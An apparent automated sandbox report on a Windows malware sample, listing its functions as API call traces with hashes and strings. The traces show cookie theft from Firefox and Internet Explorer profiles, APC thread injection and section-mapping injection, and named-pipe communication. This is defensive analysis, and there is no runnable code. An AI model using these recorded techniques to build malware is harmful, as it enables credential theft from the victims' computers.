  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
